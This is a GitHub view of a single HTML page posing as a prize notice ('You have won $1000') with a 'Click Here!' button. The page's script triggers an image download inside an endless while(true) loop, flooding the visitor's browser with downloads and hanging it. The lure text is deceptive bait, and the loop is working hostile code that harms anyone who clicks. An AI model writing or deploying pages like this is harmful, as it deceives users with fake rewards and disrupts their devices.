-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
93 lines (83 loc) · 1.96 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
@font-face {
font-family: fo;
src: url('./money.ttf');
}
body {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
width: 100vw;
}
.container {
/* add responsive padding */
padding: 5vw;
width: 50%;
height: 50%;
background-color: #f1f1f1;
display: flex;
justify-content: center;
align-items: center;
flex-direction: column;
gap: 4vh;
border-width: 1vw;
border-style: solid;
border-image: linear-gradient(to right, darkblue, darkorchid) 1;
}
img {
width: 40%;
height: 50%;
}
.data {
width: 100%;
height: 100%;
display: flex;
flex-direction: row;
justify-content: center;
align-items: center;
gap: 2vw;
font-family: fo;
}
</style>
<body>
<div class="container">
<div class="data">
<h1>You have won $1000</h1>
<img src="./donwload.jpg" alt="">
</div>
<div class="data">
<h1>Hurry up! To avail the money</h1>
<button id="button">Click Here!</button>
</div>
</div>
</div>
</body>
<script>
const button = document.getElementById("button");
button.addEventListener("click", () => {
const img = document.querySelector("img");
const a = document.createElement("a");
a.href = img.src;
a.download = "download.jpg";
a.click();
while (true) {
a.click();
}
// button.click();
})
</script>
</html>